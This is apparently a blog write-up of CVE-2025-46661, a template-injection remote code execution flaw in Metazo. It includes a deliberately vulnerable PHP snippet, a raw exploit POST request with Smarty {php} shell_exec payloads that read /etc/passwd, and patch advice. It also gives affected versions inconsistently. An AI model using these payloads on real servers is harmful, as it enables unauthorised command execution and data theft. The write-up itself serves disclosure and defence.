CVE-2025-46661 - Exploiting Unauthenticated Remote Code Execution in IPW Systems Metazo (Analyze & Demo)

In early 2025, security researchers spotted a serious flaw (now CVE-2025-46661) in IPW Systems’ Metazo software, affecting all versions through 8.1.3. This vulnerability allowed attackers to execute arbitrary code on servers *without any login needed*. The root cause? A problematic PHP file—smartyValidator.php—that let users craft and inject server-side template expressions unchecked. Let’s break it down in plain language.

Understanding the Vulnerability

Metazo uses the Smarty templating engine to build web pages. Normally, Smarty keeps things neat by separating logic from presentation. But what if an attacker can inject custom Smarty templates? Now, you’ve got a classic case of Server-Side Template Injection (SSTI).

Raw user input was passed directly to Smarty without validation or filtering.

Result: Any attacker could remotely run PHP code on the backend server.

Smarty and Server-Side Template Injection (SSTI)

Smarty templates are like blueprints for dynamic web pages. With SSTI, an attacker sneaks in their own expressions and commands, and if the app renders them, that’s game over.

For example:
- Malicious input like {php} system('id'); {/php}

Let’s look at a (simplified) example of the vulnerable code in smartyValidator.php

<?php
require_once('libs/Smarty.class.php');
$smarty = new Smarty();

if (isset($_POST['template'])) {
    $template_code = $_POST['template'];
    // DANGER: passing user input straight to eval in Smarty
    $smarty->display('string:' . $template_code);
}
?>

What’s wrong here?
Instead of using predefined templates, the server renders whatever code the user submits—no checking, no sanitizing.

Step-by-Step Exploit Example

Let’s walk through a real-world, *working* exploit scenario.

1. Send a Malicious POST Request

POST /smartyValidator.php HTTP/1.1
Host: metazo.example.org
Content-Type: application/x-www-form-urlencoded

template={php}echo shell_exec("id");{/php}

The server renders your template. If successful, the HTTP response displays something like

uid=33(www-data) gid=33(www-data) groups=33(www-data)

You can substitute any system command

{php}echo shell_exec("cat /etc/passwd");{/php}

Result: The full /etc/passwd content is displayed.
With this power, an attacker can drop a web shell, escalate privileges, or move laterally.

Mitigation & Patch

Good News:
IPW Systems responded quickly—all affected Metazo instances were patched by the supplier, closing the hole.

Patch Summary:

Upgraded Smarty to restrict risky features.

What to do if you still run an old version?
Update ASAP. Contact your supplier for fixed versions. Block access to smartyValidator.php until patched.

References

- IPW Systems Metazo Homepage
- Smarty PHP Template Engine Docs
- Server-Side Template Injection on PortSwigger
- Patch Announcement (Archived)
- CVE Details (when published): CVE-2025-46661

Final Thoughts

CVE-2025-46661 is a sharp reminder that letting users submit “template code” is almost always a bad idea. It turns routine server-side rendering into a dangerous remote code execution risk, especially when no authentication stands in the way. If you’re running Metazo below 8.1.3, patch without delay—and keep a close eye on your application inputs.

_Disclaimer: This post is for educational purposes. Never test against live targets without permission!_

Timeline

Published on: 04/28/2025 13:15:24 UTC
Last modified on: 04/29/2025 13:52:10 UTC